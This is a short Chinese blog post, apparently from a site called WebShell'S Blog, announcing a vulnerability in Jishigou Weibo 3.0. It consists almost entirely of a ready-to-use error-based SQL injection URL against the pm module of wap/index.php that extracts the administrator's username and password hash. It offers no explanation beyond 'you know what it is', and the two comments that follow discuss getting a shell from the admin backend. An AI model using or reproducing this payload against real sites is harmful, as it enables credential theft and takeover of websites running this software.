记事狗微博3.0 漏洞
不解释,你懂得!
https://www.webshell.cc/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/2716.html
后台取shell好像有点难
@word, 没试过!